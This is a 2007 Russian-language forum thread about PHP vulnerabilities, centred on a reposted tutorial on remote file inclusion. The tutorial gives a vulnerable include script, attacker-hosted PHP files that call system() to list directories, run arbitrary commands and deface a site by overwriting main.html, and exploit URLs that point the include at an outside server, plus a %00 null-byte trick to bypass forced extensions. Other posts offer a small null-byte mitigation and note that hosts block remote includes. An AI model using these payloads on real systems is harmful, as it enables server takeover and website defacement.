Добавлено: 2007-05-17 06:55:27, Vitas

Хы-хы! =)))

Добавлено: 2007-05-17 06:57:36, Vitas

Странно, но у себя на локалке я таки получил доступ к паролю к базе данных. У тя не получилось! ж-D

Добавлено: 2007-05-17 07:20:15, Vitas

Вот спасительный код от нулевого байта:

<?php

$query = str_replace("%00", "%5C0", $_SERVER["QUERY_STRING"]);
parse_str($query, $_GET);

?>

Нафлудил... =)

Добавлено: 2007-05-17 08:14:30, Sam

Можно поподробней про уязвимости?

Добавлено: 2007-05-17 08:54:02, MidNigHT_r

Функции include и require не ограничиваются просмотром “локальных” файлов на сервере. Так же можно указывать удаленные файлы (расположенные на другом сервере).
Сценарий загрузит и выполнит его.


Рассмотрим маленький пример
Назовем его sc.php.

Код

<Html>
<Head>
<Title> Php инклудинг</Title>
</Head>
<Body>
<?
If (isset($news))
{
print($news.”<BR>”)
Include($news);
}
?>
</Body>
</Html>


Так как он обычно работает (Вы, наверное, часто видели)
www.xxx.com/sc.php?news=2007/cars.html

А что мы можем сделать?
Создадим скрипт hack.php на своем сервере
Код

<?
Print(system(“ls -al”));
?>


Указываем все это дело в нашем URL.
www.xxx.com/sc.php?news=www.xaker.ru/hack.php

Результатом этого станет то, что мы сможем просмотреть содержимое директории на серве.(Для Ось Windows это команда dir).

Можно поступить проще
Создадим скрипт hack2.php

Код

<?
Print(system($cmd));
?>

И делаем так
www.xxx.com/sc.php?news=www.xaker.ru/hack2.php?cmd=ls –al;


Теперь научимся делать Дефейс.

Допустим, что на сайте жертвы главной страницей является main.html .
Пишем Скрипт hack3.php

Код

<?
Print(system(“echo” ’<center> <H1>Hacked by Syperpyper Hacker<H1> ’ > main.html));
?>


Указываем
www.xxx.com/sc.php?news=www.xaker.ru/hack3.php

То, что мы сейчас делали, очень просто. В идеале трудно найти сайт с такой ошибкой . Обычно добавляются расширения (любые)
Пример
www.xxx.com/sc.php?news=www.xaker.ru/hack3.php
выполнится
www.xxx.com/sc.php?news=www.xaker.ru/hack3.php.jpg к примеру
Но не все так печально: есть выход из этого положения
www.xxx.com/sc.php?news=www.xaker.ru/hack3.php%00
Магический символ %00 ,он означает конец строки.

(с)Sav1or
===========взято с сайта bit-team.com============

Добавлено: 2007-05-17 19:18:00, Bolzamo

> Странно, но у себя на локалке я таки получил доступ к паролю к базе данных. У тя не получилось! ж-D
См. выше. Настройки сервера не позволяют инклудить файлы с других серверов. О том же сообщает например и главная страничка хост-провайдера:
http://ho.com.ua/
> Желающим установить прокси: не напрягайтесь, исходящие соединения на порты 80 и 21 закрыты, и у вас не получится сэкономить за наш счет.

Добавлено: 2008-10-16 04:19:50, Сергей

Bolzamo, а с чего ты взял что админ сайта phpxtreme.ru? почему ты не думаешь что он тоже взломан?:))

Добавлено: 2008-10-16 06:57:19, Bolzamo

Да потому что тот сам каво хош взломает :)
Аффтар знакомый... был... ща из виду куда-то потерялся.